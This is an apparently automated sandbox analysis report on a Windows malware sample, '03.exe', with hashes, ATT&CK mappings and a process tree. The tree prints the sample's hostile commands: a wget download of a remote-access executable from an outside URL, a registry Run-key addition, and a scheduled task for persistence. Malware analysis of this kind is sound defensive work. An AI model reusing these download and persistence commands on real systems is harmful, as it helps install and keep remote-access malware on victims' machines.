9f651ae6ea538238748614a7f86fe2b0f76e881d6c38da581f284e4b6f79b0ca

Analysis

max time kernel
117s
max time network
136s
platform
windows10_x64
resource
win10-en-20211208
submitted
28-01-2022 13:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

01/2015.5.27/03.exe
Size

624KB
MD5

0744320b256d9f8ebf7387982f8efd3d
SHA1

e103e00c907ecead188a9b6a589f84ed13add671
SHA256

467f04914a1e6093bdaf5c28884bf95ec738234033b3292d289a0799de196d49
SHA512

c71c13322d0af3303cd400155f9ea4fec27ccb2ebf4f74132b86f98cdebb79e9a8f58ac2208ece478a973d73f80e0e440d3682f41580fe04c2ab9a26dc5dd406

Score

8^/10

persistence upx

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

wget.exe

pid process

3968 wget.exe

pid	process
3968	wget.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\wget.exe	upx
C:\Users\Admin\AppData\Local\Temp\wget.exe	upx

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\chrome-xvnc-v5517 = "C:\\Windows\\system32\\cmd.exe /c start /b C:\\Users\\Admin\\AppData\\Roaming\\Treams\\chrome-xvnc-v5517.exe"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3924 schtasks.exe
Modifies registry class 1 IoCs

Processes:

03.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings 03.exe

pid	process
3924	schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings	03.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

03.exeWScript.execmd.exe

description	pid	process	target process
PID 2920 wrote to memory of 2532	2920	03.exe	WScript.exe
PID 2920 wrote to memory of 2532	2920	03.exe	WScript.exe
PID 2920 wrote to memory of 2532	2920	03.exe	WScript.exe
PID 2532 wrote to memory of 3016	2532	WScript.exe	cmd.exe
PID 2532 wrote to memory of 3016	2532	WScript.exe	cmd.exe
PID 2532 wrote to memory of 3016	2532	WScript.exe	cmd.exe
PID 3016 wrote to memory of 3272	3016	cmd.exe	chcp.com
PID 3016 wrote to memory of 3272	3016	cmd.exe	chcp.com
PID 3016 wrote to memory of 3272	3016	cmd.exe	chcp.com
PID 3016 wrote to memory of 3284	3016	cmd.exe	notepad.exe
PID 3016 wrote to memory of 3284	3016	cmd.exe	notepad.exe
PID 3016 wrote to memory of 3284	3016	cmd.exe	notepad.exe
PID 3016 wrote to memory of 3968	3016	cmd.exe	wget.exe
PID 3016 wrote to memory of 3968	3016	cmd.exe	wget.exe
PID 3016 wrote to memory of 3968	3016	cmd.exe	wget.exe
PID 3016 wrote to memory of 2180	3016	cmd.exe	schtasks.exe
PID 3016 wrote to memory of 2180	3016	cmd.exe	schtasks.exe
PID 3016 wrote to memory of 2180	3016	cmd.exe	schtasks.exe
PID 3016 wrote to memory of 2156	3016	cmd.exe	schtasks.exe
PID 3016 wrote to memory of 2156	3016	cmd.exe	schtasks.exe
PID 3016 wrote to memory of 2156	3016	cmd.exe	schtasks.exe
PID 3016 wrote to memory of 1968	3016	cmd.exe	cmd.exe
PID 3016 wrote to memory of 1968	3016	cmd.exe	cmd.exe
PID 3016 wrote to memory of 1968	3016	cmd.exe	cmd.exe
PID 3016 wrote to memory of 1852	3016	cmd.exe	find.exe
PID 3016 wrote to memory of 1852	3016	cmd.exe	find.exe
PID 3016 wrote to memory of 1852	3016	cmd.exe	find.exe
PID 3016 wrote to memory of 3916	3016	cmd.exe	reg.exe
PID 3016 wrote to memory of 3916	3016	cmd.exe	reg.exe
PID 3016 wrote to memory of 3916	3016	cmd.exe	reg.exe
PID 3016 wrote to memory of 3924	3016	cmd.exe	schtasks.exe
PID 3016 wrote to memory of 3924	3016	cmd.exe	schtasks.exe
PID 3016 wrote to memory of 3924	3016	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\01\2015.5.27\03.exe
"C:\Users\Admin\AppData\Local\Temp\01\2015.5.27\03.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2920

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tron.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:2532

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c tron.cmd
3⤵
- Suspicious use of WriteProcessMemory
PID:3016

C:\Windows\SysWOW64\chcp.com
chcp 1251
4⤵
PID:3272

C:\Windows\SysWOW64\notepad.exe
notepad.exe "C:\Users\Admin\AppData\Local\Temp\SystemsErrorOpeningTheDocumentMicrosoftOfficeOfFri 12/10/2021.doc"
4⤵
PID:3284

C:\Users\Admin\AppData\Local\Temp\wget.exe
wget.exe -N http://prestigeclub.frantov.com.ua/press-center/press/chrome-xvnc-v5517.exe
4⤵
- Executes dropped EXE
PID:3968

C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /tn ChromeUpdates_ups /f
4⤵
PID:2180

C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /tn Trons_ups /f
4⤵
PID:2156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ver "
4⤵
PID:1968

C:\Windows\SysWOW64\find.exe
find "Microsoft Windows XP"
4⤵
PID:1852

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v chrome-xvnc-v5517 /t REG_EXPAND_SZ /d "C:\Windows\system32\cmd.exe /c start /b C:\Users\Admin\AppData\Roaming\Treams\chrome-xvnc-v5517.exe" /f
4⤵
- Adds Run key to start application
PID:3916

C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /tn Trons_ups /TR "C:\Users\Admin\AppData\Roaming"\Treams\chrome-xvnc-v5517.exe /SC MINUTE /mo 180
4⤵
- Creates scheduled task(s)
PID:3924

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tron.cmd
MD5
262777e5e1da79784c08acbb2002c169

SHA1
f24eaca19cac7b72a95f116690330b477df4bb04

SHA256
068b9a9194efacc16cf142814e79b7041b6ab3d671a95bb508dbd30061c324aa

SHA512
16f678aad5de8847cb065e828bbf14913383bdc4910fdbca1b21cc16f7b0d859260546ae68fc3739b199d878116e10c5dc5995f5379c51335af8c382849f1285

Download Submit
C:\Users\Admin\AppData\Local\Temp\tron.vbs
MD5
3b8cdcc376903e45eeca70d2c6a3c435

SHA1
379a2959a263c74fbc7d6dec98ceab9700d77742

SHA256
42b4c39179f76ea9eb5835b55a3cf4d8dbb29d42ee0622ad2e89ca48d01e8988

SHA512
a331e2237be54e496220cf335d52810036fdf21eecc3eb5cb08ced6add348d9a54da8e032e67e7d52d9e6fbe1fe46b0f829306fb50f351606f4b6126fb5faa12

Download Submit
C:\Users\Admin\AppData\Local\Temp\wget.exe
MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\wget.exe
MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit